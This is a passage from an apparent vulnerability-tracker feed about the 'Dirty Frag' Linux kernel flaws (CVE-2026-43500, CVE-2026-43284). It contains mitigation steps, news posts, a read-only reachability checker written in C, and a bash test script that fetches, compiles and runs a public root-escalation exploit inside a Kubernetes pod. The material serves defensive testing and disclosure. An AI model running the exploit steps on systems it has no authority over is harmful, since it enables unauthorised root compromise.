block:\n\n```yaml\n- name: Block disabled kernel modules from loading\n  ansible.builtin.copy:\n    dest: \"/etc/modprobe.d/disable-{{ item }}.conf\"\n    owner: root\n    group: root\n    mode: \"0644\"\n    content: |\n      install {{ item }} /bin/false\n  loop: \"{{ disabled_kernel_modules | default([]) }}\"\n  register: disabled_kernel_module_blacklists\n\n- name: Unload disabled kernel modules if currently loaded\n  community.general.modprobe:\n    name: \"{{ item }}\"\n    state: absent\n  loop: \"{{ disabled_kernel_modules | default([]) }}\"\n  register: disabled_kernel_module_unloads\n  failed_when: false\n\n- name: Flush filesystem buffers before clearing page cache\n  ansible.builtin.command: sync\n  changed_when: false\n  when: disabled_kernel_module_blacklists.changed or disabled_kernel_module_unloads.changed\n\n- name: Clear page cache after 
Dirty Frag mitigation changes\n  ansible.builtin.command: sysctl -w vm.drop_caches=3\n  changed_when: true\n  when: disabled_kernel_module_blacklists.changed or disabled_kernel_module_unloads.changed\n```\n\n## Remove the manual mitigation later\n\nOnly do this after your running kernel is fixed and you have rebooted into it.\n\n```bash\nsudo rm /etc/modprobe.d/disable-dirtyfrag.conf\nsudo reboot\n```\n", "creation_timestamp": "2026-05-08T16:19:20.000000Z"}, {"uuid": "47fe1743-21e1-44f6-b5a0-8182e12ee011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/threatintel.microsoft.com/post/3mleath2kmz2p", "content": "A newly disclosed Linux local privilege escalation vulnerability known as \u201cDirty Frag\u201d enables escalation from an unprivileged user to root through vulnerable kernel networking & memory-fragment handling components, including esp4, esp6 (CVE-2026-43284), and rxrpc (CVE-2026-43500). 
msft.it/6015v3WNc", "creation_timestamp": "2026-05-08T17:26:35.837613Z"}, {"uuid": "7f779aba-f9b8-47d8-b8c1-06b83223038d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/crustytldr.bsky.social/post/3mlfyh6uxkw22", "content": "\ud83d\udd12 Dirty Frag (CVE-2026-43284, CVE-2026-43500): Mitigation\n\nDirty Frag (CVE-2026-43284, CVE-2026-43500) is a newly disclosed Linux kernel local privilege escalation vulnerability affecting I...\n\nhttps://is.gd/AoNgC0 #CyberSecurity #InfoSec #CrustyTLDR", "creation_timestamp": "2026-05-09T10:01:53.740445Z"}, {"uuid": "fefa0699-f39b-416b-8fab-2858492db34f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/kzzalews/dc37275ebd58c0367245260abd1b5145", "content": "#!/usr/bin/env bash\n# =============================================================================\n# DirtyFrag & Copy Fail \u2014 Empirical Exploitability Test\n# Target:  Any AKS cluster (Ubuntu 22.04, kernel 5.15.x-azure)\n# CVEs:    CVE-2026-43284 (DirtyFrag xfrm-ESP)\n#          CVE-2026-43500 (DirtyFrag RxRPC)\n#          CVE-2026-31431 (Copy Fail / algif_aead)\n# Advisory: https://github.com/Azure/AKS/issues/5753\n# Author:  Karol Zalewski / Aiko (Claude Sonnet 4.6) \u2014 2026-05-09\n#\n# USAGE:\n#   Set AZ_RG, AZ_CLUSTER, KUBE_CONTEXT below to match your cluster,\n#   then run:  ./dirtyfrag-cve-test.sh 2>&1 | tee results.txt\n#\n# WARNING: This script compiles and executes a public exploit PoC\n#   (V4bel/dirtyfrag). 
Run only in DEV/test environments, with\n#   explicit team approval, and only if you are authorised to do so.\n# =============================================================================\n\nset -euo pipefail\n\n# --- config \u2014 EDIT THESE -----------------------------------------------------\nAZ_RG=\"example-rg\"                      # Azure resource group of the cluster\nAZ_CLUSTER=\"example-cluster\"            # AKS cluster name\nKUBE_CONTEXT=\"example-cluster\"          # kubectl context name\nNAMESPACE=\"default\"\nTEST_NODE_POOL=\"nodepool1\"               # picks first schedulable node from this pool\nPOD_DIRTYFRAG=\"dirtyfrag-test\"\nPOD_COPYFAIL=\"copyfail-test\"\n# -----------------------------------------------------------------------------\n\nRED='\\033[0;31m'; YELLOW='\\033[1;33m'; GREEN='\\033[0;32m'; CYAN='\\033[0;36m'; NC='\\033[0m'\n\nlog()  { echo -e \"${CYAN}[$(date +%H:%M:%S)]${NC} $*\"; }\nok()   { echo -e \"${GREEN}[OK]${NC} $*\"; }\nwarn() { echo -e \"${YELLOW}[WARN]${NC} $*\"; }\nerr()  { echo -e \"${RED}[ERROR]${NC} $*\"; }\n\nconfirm() {\n  local msg=\"${1:-Continue?}\"\n  echo \"\"\n  read -r -p \"$(echo -e \"${YELLOW}>>> ${msg} [y/N] ${NC}\")\" ans\n  [[ \"${ans}\" =~ ^[Yy]$ ]] || { warn \"Skipped by user.\"; return 1; }\n}\n\n# --- cleanup -----------------------------------------------------------------\nCLEANUP_DONE=0\ncleanup() {\n  [[ ${CLEANUP_DONE} -eq 1 ]] && return\n  CLEANUP_DONE=1\n  echo \"\"\n  warn \"=== CLEANUP ===\"\n  kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \"${POD_COPYFAIL}\" \\\n    --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n  ok \"Test pods removed.\"\n}\ntrap cleanup EXIT INT TERM\n\n# =============================================================================\n# STEP 0 \u2014 Fetch kubeconfig & switch context\n# =============================================================================\necho \"\"\necho -e 
\"${CYAN}========================================${NC}\"\necho -e \"${CYAN}  DirtyFrag / Copy Fail \u2014 CVE Test     ${NC}\"\necho -e \"${CYAN}========================================${NC}\"\necho \"\"\n\nlog \"Step 0: Fetching kubeconfig for ${AZ_CLUSTER} (RG: ${AZ_RG})\"\naz aks get-credentials \\\n  --resource-group \"${AZ_RG}\" \\\n  --name \"${AZ_CLUSTER}\" \\\n  --overwrite-existing\nok \"Kubeconfig merged.\"\n\nkubectl config use-context \"${KUBE_CONTEXT}\"\nok \"Context set to: ${KUBE_CONTEXT}\"\n\n# --- sanity check ------------------------------------------------------------\nlog \"Verifying node state...\"\nkubectl --context \"${KUBE_CONTEXT}\" get nodes \\\n  -o custom-columns=\"NAME:.metadata.name,STATUS:.status.conditions[-1].type,KERNEL:.status.nodeInfo.kernelVersion,SCHED:.spec.unschedulable\" \\\n  2>/dev/null || true\necho \"\"\n\n# Pick first schedulable node from the target pool\nTARGET_NODE=$(kubectl --context \"${KUBE_CONTEXT}\" get nodes \\\n  --no-headers \\\n  -o custom-columns=\"NAME:.metadata.name,SCHED:.spec.unschedulable\" \\\n  2>/dev/null \\\n  | awk -v pool=\"${TEST_NODE_POOL}\" '$1 ~ pool && $2 == \"\" {print $1; exit}')\n\nif [[ -z \"${TARGET_NODE}\" ]]; then\n  err \"No schedulable '${TEST_NODE_POOL}' node found. 
Check node status above and re-run.\"\n  exit 1\nfi\nok \"Target node: ${TARGET_NODE}\"\n\n# =============================================================================\n# STEP 1 \u2014 DirtyFrag xfrm-ESP (CVE-2026-43284) \u2014 THE KEY QUESTION\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 1: DirtyFrag xfrm-ESP (CVE-2026-43284) ---${NC}\"\nwarn \"This step compiles and runs the researcher PoC (V4bel/dirtyfrag).\"\nwarn \"Expected outcomes:\"\nwarn \"  ROOT SHELL   \u2192 kernel 5.15 IS vulnerable to xfrm-ESP; AKS advisory incorrect\"\nwarn \"  EXPLOIT FAIL \u2192 kernel 5.15 is NOT vulnerable; AKS advisory correct\"\necho \"\"\n\nconfirm \"Run DirtyFrag xfrm-ESP test on ${TARGET_NODE}?\" || { warn \"Skipping Step 1.\"; goto_step2=1; }\n\nif [[ -z \"${goto_step2:-}\" ]]; then\n  log \"Spawning compiler pod (gcc:13) on ${TARGET_NODE}...\"\n  kubectl --context \"${KUBE_CONTEXT}\" run \"${POD_DIRTYFRAG}\" \\\n    --image=gcc:13 \\\n    --restart=Never \\\n    --namespace \"${NAMESPACE}\" \\\n    --overrides=\"$(printf '{\n      \"spec\": {\n        \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n        \"tolerations\": [{\"operator\": \"Exists\"}]\n      }\n    }' \"${TARGET_NODE}\")\" \\\n    -- sleep 1800\n\n  log \"Waiting for pod to be Ready (up to 120s)...\"\n  kubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_DIRTYFRAG}\" \\\n    --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\"\n  ok \"Pod ready.\"\n\n  KERNEL=$(kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- uname -r 2>/dev/null)\n  log \"Kernel on node: ${KERNEL}\"\n\n  log \"Cloning and compiling DirtyFrag PoC inside pod...\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- bash -c '\n      git clone https://github.com/V4bel/dirtyfrag.git /tmp/dirtyfrag 2>&1\n      cd 
/tmp/dirtyfrag\n      gcc -O0 -Wall -o exp exp.c -lutil 2>&1\n      echo \"[COMPILE OK] binary: /tmp/dirtyfrag/exp\"\n    '\n\n  echo \"\"\n  warn \"About to execute the exploit as UID 65534 (nobody) inside the pod.\"\n  warn \"Watch for: root shell, uid=0, or /etc/passwd modification.\"\n  warn \"If you get a root prompt inside the pod, type 'exit' to return.\"\n  # Run the PoC only when the operator confirms; declining skips execution.\n  if confirm \"Execute ./exp inside pod?\"; then\n    echo \"\"\n    echo -e \"${RED}=== EXPLOIT OUTPUT START ===${NC}\"\n    kubectl --context \"${KUBE_CONTEXT}\" exec -it \"${POD_DIRTYFRAG}\" \\\n      --namespace \"${NAMESPACE}\" -- \\\n      bash -c 'cd /tmp/dirtyfrag && su -s /bin/bash nobody -c \"./exp\" 2>&1 || ./exp' \\\n      || true\n    echo -e \"${RED}=== EXPLOIT OUTPUT END ===${NC}\"\n    echo \"\"\n  else\n    warn \"Exploit execution skipped.\"\n  fi\n\n  log \"Step 1 cleanup: clearing page cache and unloading modules on node...\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- \\\n    bash -c 'echo 3 > /proc/sys/vm/drop_caches 2>/dev/null; rmmod esp4 esp6 rxrpc 2>/dev/null; echo \"cleanup done\"' \\\n    || warn \"Page cache flush may require privileged access \u2014 check node manually if exploit succeeded.\"\n\n  kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \\\n    --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n  ok \"Step 1 pod removed.\"\nfi\n\n# =============================================================================\n# STEP 2 \u2014 DirtyFrag RxRPC (CVE-2026-43500) \u2014 expected FAIL on 5.15\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 2: DirtyFrag RxRPC (CVE-2026-43500) ---${NC}\"\nwarn \"Expected: FAIL. 
Both AKS advisory and researcher agree RxRPC requires kernel >= 6.4.\"\nwarn \"This step confirms that kernel 5.15 is out-of-range for the RxRPC chain.\"\necho \"\"\n\n# Record the operator's answer so that declining really skips Step 2.\nskip_step2=\"\"\nconfirm \"Run DirtyFrag RxRPC test (expected fail)?\" || { warn \"Skipping Step 2.\"; skip_step2=1; }\n\nif [[ -z \"${skip_step2}\" ]]; then\n  log \"Re-using same pod setup for Step 2...\"\n  kubectl --context \"${KUBE_CONTEXT}\" run \"${POD_DIRTYFRAG}\" \\\n    --image=gcc:13 \\\n    --restart=Never \\\n    --namespace \"${NAMESPACE}\" \\\n    --overrides=\"$(printf '{\n      \"spec\": {\n        \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n        \"tolerations\": [{\"operator\": \"Exists\"}]\n      }\n    }' \"${TARGET_NODE}\")\" \\\n    -- sleep 600 2>/dev/null || true\n\n  kubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_DIRTYFRAG}\" \\\n    --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\" 2>/dev/null || true\n\n  log \"Checking if rxrpc module loads on 5.15...\"\n  echo -e \"${RED}=== RXRPC MODULE CHECK ===${NC}\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- \\\n    bash -c '\n      uname -r\n      echo \"Attempting to load rxrpc...\"\n      modprobe rxrpc 2>&1 || echo \"modprobe rxrpc: failed (expected on 5.15 if module not present)\"\n      lsmod | grep rxrpc || echo \"rxrpc: not loaded\"\n      ls /lib/modules/$(uname -r)/kernel/net/rxrpc/ 2>/dev/null || echo \"rxrpc module directory: not found (kernel too old)\"\n    ' || true\n  echo -e \"${RED}=== END ===${NC}\"\n\n  kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \\\n    --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n  ok \"Step 2 done.\"\nfi\n\n# =============================================================================\n# STEP 3 \u2014 Copy Fail baseline (CVE-2026-31431)\n# =============================================================================\necho 
\"\"\necho -e \"${CYAN}--- Step 3: Copy Fail baseline (CVE-2026-31431) ---${NC}\"\nwarn \"Non-root pod (UID 1000). Tests whether AF_ALG socket auto-loads algif_aead.\"\nwarn \"Expected to succeed on nodes WITHOUT an algif_aead blacklist.\"\necho \"\"\n\nconfirm \"Run Copy Fail baseline test?\" || { warn \"Skipping Step 3.\"; exit 0; }\n\nlog \"Spawning non-root pod (python:3.12-slim, UID 1000)...\"\nkubectl --context \"${KUBE_CONTEXT}\" run \"${POD_COPYFAIL}\" \\\n  --image=python:3.12-slim \\\n  --restart=Never \\\n  --namespace \"${NAMESPACE}\" \\\n  --overrides=\"$(printf '{\n    \"spec\": {\n      \"securityContext\": {\"runAsNonRoot\": true, \"runAsUser\": 1000, \"runAsGroup\": 1000},\n      \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n      \"tolerations\": [{\"operator\": \"Exists\"}]\n    }\n  }' \"${TARGET_NODE}\")\" \\\n  -- sleep 600\n\nkubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_COPYFAIL}\" \\\n  --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\"\nok \"Pod ready.\"\n\necho \"\"\necho -e \"${RED}=== COPY FAIL \u2014 AF_ALG SOCKET TEST ===${NC}\"\nkubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_COPYFAIL}\" \\\n  --namespace \"${NAMESPACE}\" -- \\\n  python3 -c \"\nimport socket, os\nprint('Running as UID:', os.getuid())\nprint('Kernel:', open('/proc/version').read().split()[2])\ntry:\n    s = socket.socket(38, 5, 0)  # AF_ALG, SOCK_SEQPACKET\n    s.bind(('aead', 'authencesn(hmac(sha256),cbc(aes))'))\n    print('RESULT: algif_aead auto-loaded via AF_ALG socket')\n    print('VERDICT: Node IS vulnerable to Copy Fail (CVE-2026-31431)')\n    s.close()\nexcept PermissionError as e:\n    print('RESULT: AF_ALG bind blocked -', e)\n    print('VERDICT: algif_aead blacklist active OR module unavailable')\nexcept OSError as e:\n    print('RESULT: AF_ALG socket error -', e)\n    print('VERDICT: Module not loadable (kernel too old or not present)')\n\" 2>&1 || true\necho -e \"${RED}=== END ===${NC}\"\n\nkubectl --context 
\"${KUBE_CONTEXT}\" delete pod \"${POD_COPYFAIL}\" \\\n  --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\nok \"Step 3 done.\"\n\n# =============================================================================\n# SUMMARY\n# =============================================================================\necho \"\"\necho -e \"${CYAN}========================================${NC}\"\necho -e \"${CYAN}  Test complete.                        ${NC}\"\necho -e \"${CYAN}========================================${NC}\"\necho \"\"\necho \"Key things to note:\"\necho \"  - Step 1: Did ./exp produce a root shell? (y/n + full output)\"\necho \"  - Step 2: Was rxrpc.ko present on 5.15? (expected: no)\"\necho \"  - Step 3: Did AF_ALG socket load algif_aead? (expected: yes on unmitigated node)\"\necho \"  - Node: ${TARGET_NODE} / Context: ${KUBE_CONTEXT}\"\necho \"\"\n", "creation_timestamp": "2026-05-09T10:18:18.000000Z"}, {"uuid": "5d17ebe3-2ccb-4747-9c88-dab18b98c389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116544139092238924", "content": "Today's #DirtyFrag roundup:\nOf course Microsoft jumped at the chance with an article about a Linux vuln ...because M love Linux\ud83d\udc47 https://www.microsoft.com/en-us/security/blog/2026/05/08/active-attack-dirty-frag-linux-vulnerability-expands-post-compromise-risk/\nThe must-read Tenable FAQ for those who, like me, enjoy reading CVEs like an IKEA instruction manual\ud83d\udc47 https://www.tenable.com/blog/dirty-frag-cve-2026-43284-cve-2026-43500-frequently-asked-questions-linux-kernel-lpe\nRed Hat has updated its RHSB-2026-003 page with mitigations and checks, while waiting for the patch that is coming \"soon\u2122\" \ud83d\udc47 
https://access.redhat.com/security/vulnerabilities/RHSB-2026-003\nAnd at home on my beautiful, beloved Debian? The security channels are patched for bullseye, bookworm and trixie. Well done!\ud83d\udc47 https://security-tracker.debian.org/tracker/CVE-2026-43284\nThat said, with AI speeding up discovery + embargoes that no longer hold = an exposure window that is not going to shrink. Maintainers will have to find new tricks. Live-patch, micro-patch, accelerated pipelines... to be continued.\n#CyberVeille", "creation_timestamp": "2026-05-09T10:27:16.984765Z"}, {"uuid": "37033961-9148-48bf-9a5e-f9784855ca2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/ostechnix.bsky.social/post/3mlg7ub7k7s2m", "content": "Fedora pushed kernel 7.0.4 to stable to fix the Dirty Frag and Copy Fail 2 vulnerabilities. Both CVE-2026-43284 and CVE-2026-43500 Patched.\n\nFull details here: ostechnix.com/fedora-44-ke... 
\n\n#Fedora44 #Linuxkernel704 #DirtyFrag #CopyFail2 #CVE_2026_43284 #CVE_2026_43500", "creation_timestamp": "2026-05-09T12:14:33.797523Z"}, {"uuid": "64c35aa1-3b84-473f-b277-650f63b53dcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3mlg7xouqjr2s", "content": "Dirty Frag (CVE-2026-43284 and CVE-2026-43500): xfrm-ESP and RxRPC, the page-cache write primitives behind the new LPE of May\n\n\nhttps://elsolitario.org/2026/05/09/dirty-frag-cve-2026-43284-y-cve-2026-43500-xfrm-esp-y-rxrpc-los-page-cache-write/?utm_source=bluesky&utm_medium=social&utm_campaign=pro...", "creation_timestamp": "2026-05-09T12:16:24.512733Z"}, {"uuid": "d16a7935-1539-4fda-a269-8c887f637b67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3mlg7yapvym27", "content": "Dirty Frag (CVE-2026-43284 and CVE-2026-43500): xfrm-ESP and RxRPC, the page-cache write primitives behind the new LPE of May\n\n\nhttps://elsolitario.org/2026/05/09/dirty-frag-cve-2026-43284-y-cve-2026-43500-xfrm-esp-y-rxrpc-los-page-cache-write/?utm_source=bluesky&utm_medium=social&utm_campaign=pro...", "creation_timestamp": "2026-05-09T12:16:42.615965Z"}, {"uuid": "d881e0d8-a2ff-459b-99cf-074c72cb51cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3mlg7yr5bje27", "content": "Dirty Frag (CVE-2026-43284 and CVE-2026-43500): xfrm-ESP and RxRPC, the page-cache write primitives behind the new LPE of 
May\n\n\nhttps://elsolitario.org/2026/05/09/dirty-frag-cve-2026-43284-y-cve-2026-43500-xfrm-esp-y-rxrpc-los-page-cache-write/?utm_source=bluesky&utm_medium=social&utm_campaign=pro...", "creation_timestamp": "2026-05-09T12:16:59.411836Z"}, {"uuid": "3633fcc2-67cf-4e33-851c-e44a4fa6d84a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mlgkaaqqmx2m", "content": "Linux Kernel LPE (Local Privilege Escalation) vulnerability (Dirty Frag: CVE-2026-43284, CVE-2026-43500) - SIOS SECURITY BLOG\nhttps://security.sios.jp/vulnerability/kernel-security-vulnerability-20260508/", "creation_timestamp": "2026-05-09T15:20:08.794996Z"}, {"uuid": "f95ee5af-f9fc-42cd-a2a5-6311720be878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83525", "content": "\ud83d\udea8 GitHub monitoring alert\n\n\ud83d\udea8 Keyword found: #CVE-2026\n\n\ud83d\udce6 Project name: dirty-frag-check\n\ud83d\udc64 Project author: haydenjames\n\ud83d\udee0 Development language: Shell\n\u2b50 Star count: 1  |  \ud83c\udf74 Fork count: 0\n\ud83d\udcc5 Update time: 2026-05-09 14:58:13\n\n\ud83d\udcdd Project description:\nRead-only checker for CVE-2026-43284 / CVE-2026-43500 (Dirty Frag) Linux kernel local-root vulns\n\n\ud83d\udd17 Click to visit the project URL", "creation_timestamp": "2026-05-09T15:00:04.000000Z"}, {"uuid": "94c058ed-5994-41b2-895c-33c4a5b653f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/artem-panchenko/0fab615ba3e9a7b471b659bef4472281", "content": "// Dirty Frag CVE reachability + diagnostic check (C port of dirtyfrag_check.py).\n//\n// Determines whether this container can reach either of the two CVEs in the\n// Dirty Frag chain and reports which kernel/sandbox layer is blocking.\n// Read-only; no exploit primitive is run.\n//\n// CVEs covered:\n//   CVE-2026-43500 - RxRPC Page-Cache Write\n//     NVD:      https://nvd.nist.gov/vuln/detail/CVE-2026-43500\n//     Write-up: https://github.com/V4bel/dirtyfrag\n//\n//   CVE-2026-43284 - xfrm-ESP Page-Cache Write\n//     NVD:      https://nvd.nist.gov/vuln/detail/CVE-2026-43284\n//     Write-up: https://github.com/V4bel/dirtyfrag\n//\n// Build:   gcc -O0 -Wall -o /tmp/dirtyfrag_check dirtyfrag_check.c\n// Run:     /tmp/dirtyfrag_check\n\n#define _GNU_SOURCE\n#include <errno.h>\n#include <fcntl.h>\n#include <sched.h>\n#include <stdbool.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/socket.h>\n#include <sys/stat.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <unistd.h>\n\n#ifndef AF_RXRPC\n#define AF_RXRPC 33\n#endif\n#ifndef NETLINK_XFRM\n#define NETLINK_XFRM 6\n#endif\n#ifndef CLONE_NEWUSER\n#define CLONE_NEWUSER 0x10000000\n#endif\n#ifndef CLONE_NEWNET\n#define CLONE_NEWNET  0x40000000\n#endif\n#ifndef CLONE_NEWNS\n#define CLONE_NEWNS   0x00020000\n#endif\n#ifndef CLONE_NEWPID\n#define CLONE_NEWPID  0x20000000\n#endif\n\n// ---------- helpers ----------\n\n// Read a small file's contents into buf (NUL-terminated, trailing whitespace\n// stripped). Returns buf. 
On error, fills buf with \"\".\nstatic const char *cat(const char *path, char *buf, size_t buflen) {\n    int fd = open(path, O_RDONLY);\n    if (fd < 0) {\n        snprintf(buf, buflen, \"\", strerror(errno));\n        return buf;\n    }\n    ssize_t n = read(fd, buf, buflen - 1);\n    close(fd);\n    if (n < 0) {\n        snprintf(buf, buflen, \"\", strerror(errno));\n        return buf;\n    }\n    buf[n] = 0;\n    while (n > 0 && (buf[n - 1] == '\\n' || buf[n - 1] == ' ' || buf[n - 1] == '\\t')) {\n        buf[--n] = 0;\n    }\n    return buf;\n}\n\n// Pull a \"Name: value\" field out of /proc/self/status. Returns NULL if absent.\nstatic const char *proc_status_field(const char *name, char *out, size_t outlen) {\n    FILE *fp = fopen(\"/proc/self/status\", \"r\");\n    if (!fp) { out[0] = 0; return NULL; }\n    char line[512];\n    size_t namelen = strlen(name);\n    while (fgets(line, sizeof(line), fp)) {\n        if (strncmp(line, name, namelen) == 0 && line[namelen] == ':') {\n            const char *v = line + namelen + 1;\n            while (*v == ' ' || *v == '\\t') v++;\n            size_t L = strlen(v);\n            while (L && (v[L-1] == '\\n' || v[L-1] == ' ')) L--;\n            if (L >= outlen) L = outlen - 1;\n            memcpy(out, v, L);\n            out[L] = 0;\n            fclose(fp);\n            return out;\n        }\n    }\n    fclose(fp);\n    out[0] = 0;\n    return NULL;\n}\n\n// True if a kernel module is loaded on the node.\n// Checks /sys/module/<name>/ first, then /proc/modules with exact-prefix match.\nstatic bool module_loaded(const char *name) {\n    char path[256];\n    snprintf(path, sizeof(path), \"/sys/module/%s\", name);\n    struct stat st;\n    if (stat(path, &st) == 0) return true;\n\n    FILE *fp = fopen(\"/proc/modules\", \"r\");\n    if (!fp) return false;\n    char line[512];\n    size_t namelen = strlen(name);\n    bool found = false;\n    while (fgets(line, sizeof(line), fp)) {\n     
   if (strncmp(line, name, namelen) == 0 && line[namelen] == ' ') {\n            found = true;\n            break;\n        }\n    }\n    fclose(fp);\n    return found;\n}\n\n// Fork a child, attempt unshare(flags), report back to the parent.\n// Returns NULL on success, otherwise strerror() of the errno from unshare().\nstatic const char *try_unshare(int flags) {\n    pid_t pid = fork();\n    if (pid < 0) return strerror(errno);\n    if (pid == 0) {\n        int rc = unshare(flags);\n        _exit(rc == 0 ? 0 : (errno & 0xff));\n    }\n    int st;\n    if (waitpid(pid, &st, 0) < 0) return strerror(errno);\n    if (!WIFEXITED(st)) return \"child died abnormally\";\n    int code = WEXITSTATUS(st);\n    return code == 0 ? NULL : strerror(code);\n}\n\nstatic void section(const char *title) {\n    putchar('\\n');\n    for (int i = 0; i < 72; i++) putchar('=');\n    printf(\"\\n%s\\n\", title);\n    for (int i = 0; i < 72; i++) putchar('=');\n    putchar('\\n');\n}\n\n// Tiny convenience: returns \"true\" / \"false\" string for printing.\nstatic const char *tf(bool v) { return v ? \"true\" : \"false\"; }\n\n// ---------- CVE-2026-43500 RxRPC check ----------\n\ntypedef struct {\n    const char *verdict;   // \"EXPLOITABLE\" or \"NOT EXPLOITABLE\"\n    const char *cve;       // \"CVE-2026-43500 RxRPC\"\n    char        why[256];  // one-line reason\n} result_t;\n\nstatic result_t check_rxrpc(void) {\n    section(\"CVE-2026-43500 - RxRPC Page-Cache Write\");\n    puts(\"  Family:    Dirty Frag chain\");\n    puts(\"  NVD:       https://nvd.nist.gov/vuln/detail/CVE-2026-43500\");\n    puts(\"  Write-up:  https://github.com/V4bel/dirtyfrag\");\n    puts(\"  Trigger:   socket(AF_RXRPC, ...) 
- no caps, no namespace needed\");\n    puts(\"  Distinct:  Reaches the bug WITHOUT requiring CAP_NET_ADMIN or a\");\n    puts(\"             user namespace - so seccomp+caps alone do not stop it.\");\n    puts(\"             Mitigation must be node-level (rxrpc.ko unload/blacklist).\");\n    putchar('\\n');\n\n    bool reachable = false;\n    int s = socket(AF_RXRPC, SOCK_DGRAM, 0);\n    if (s >= 0) {\n        close(s);\n        reachable = true;\n        puts(\"  Reachability: REACHABLE - exploitable from this container\");\n    } else {\n        printf(\"  Reachability: blocked (%s, errno %d)\\n\", strerror(errno), errno);\n    }\n\n    char protos[8192], initstate[64];\n    cat(\"/proc/net/protocols\", protos, sizeof(protos));\n    bool rxrpc_in_protos = strstr(protos, \"RXRPC\") != NULL;\n    bool rxrpc_mod = module_loaded(\"rxrpc\");\n    cat(\"/sys/module/rxrpc/initstate\", initstate, sizeof(initstate));\n\n    putchar('\\n');\n    puts(\"  Why (kernel module presence):\");\n    printf(\"    AF_RXRPC in /proc/net/protocols: %s\\n\", tf(rxrpc_in_protos));\n    printf(\"    rxrpc.ko loaded:                 %s\\n\", tf(rxrpc_mod));\n    printf(\"    /sys/module/rxrpc/initstate:     %s\\n\", initstate);\n\n    result_t r = { .cve = \"CVE-2026-43500 RxRPC\" };\n    if (reachable) {\n        r.verdict = \"EXPLOITABLE\";\n        snprintf(r.why, sizeof(r.why),\n                 \"AF_RXRPC socket reachable - bug primitive available\");\n    } else {\n        r.verdict = \"NOT EXPLOITABLE\";\n        snprintf(r.why, sizeof(r.why),\n                 \"rxrpc kernel module not loaded on node\");\n    }\n    return r;\n}\n\n// ---------- CVE-2026-43284 xfrm-ESP check ----------\n\nstatic result_t check_xfrm(void) {\n    section(\"CVE-2026-43284 - xfrm-ESP Page-Cache Write\");\n    puts(\"  Family:    Dirty Frag chain (patched mainline 2026-05-08)\");\n    puts(\"  NVD:       https://nvd.nist.gov/vuln/detail/CVE-2026-43284\");\n    puts(\"  